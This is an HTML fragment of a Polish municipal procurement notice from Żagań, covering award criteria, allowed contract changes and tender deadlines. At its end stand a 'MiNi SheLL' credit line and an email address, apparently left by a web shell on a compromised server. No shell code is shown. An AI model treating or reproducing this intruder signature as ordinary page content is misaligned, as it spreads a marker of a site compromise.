<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Termin Wykonania - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany w umowie : 
1. Zamawiający - na podstawie art.144 ust.1 i 2 Ustawy Prawo zamówień publicznych 
    dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty na 
    podstawie, której dokonano wyboru Wykonawcy: 
2. Dopuszczalne jest dokonanie zmian umowy:  
1) zmiana nazw, siedziby stron umowy, numerów kont bankowych, innych danych
     identyfikacyjnych; 
2) wykonanie zamówienia przy pomocy podwykonawców, za zgodą zamawiającego 
     3) zmiana warunków płatności 
     4) zmiany w obowiązujących przepisach, jeżeli zgodnie z nimi konieczne będzie 
         dostosowanie treści umowy do aktualnego stanu prawnego, w tym np. podatku VAT. 
   5) w zakresie zmiany lub rezygnacji z podwykonawcy : 
          a)  na którego zasoby Wykonawca  powoływał się w celu wykazania spełnienia 
                warunków udziału w postepowaniu, lub 
          b)  z którym zawarto umowę o podwykonawstwo w trakcie realizacji zamówienia   
             publicznego,   pod warunkiem, że : 
               - Wykonawca  wykaże, iż proponowany inny podwykonawca spełni warunki udziału
                  w  postepowaniu w stopniu nie mniejszym niż wymagany w trakcie postepowania
                  o   udzielenie zamówienia; lub 
              -  Wykonawca  wykaże,  iż samodzielnie spełni warunki udziału w postępowaniu w 
                 stopniu nie mniejszym niż wymagany w trakcie postpowania o udzielenie 
                  zamówienia;
3. Zmiany, o których mowa w ust. 2 punktu 16.6., dokonywane będą wyłącznie pod     
    warunkiem złożenia pisemnego wniosku przez jedną ze Stron i po jego akceptacji przez 
    drugą Stronę.
4. Wszelkie zmiany oraz uzupełnienia niniejszej umowy, wymagają formy pisemnej pod  
    rygorem nieważności. 
5. Zmiana umowy dokonana z naruszeniem  warunków  określonych  w ustępie 2 punktu 
     16.6. podlega unieważnieniu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.um.zagan.pl   w Bip-ie  zakladka przyetargi publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> na pisemny wniosek Wykonawcy  68-100 Żagań ul. Jana Pawła II nr 15 pok. nr 20 Wydział Zamówień Publicznych i Nadzoru Właścicielskiego , Urząd Miasta.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.12.2015 godzina 11:00, miejsce: Wydział Zamówień Publicznych i Nadzoru Właścicielskiego Urzędu Miasta ul. Jana Pawła II nr 15 pok., nr 20,  68-100 Żagań.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com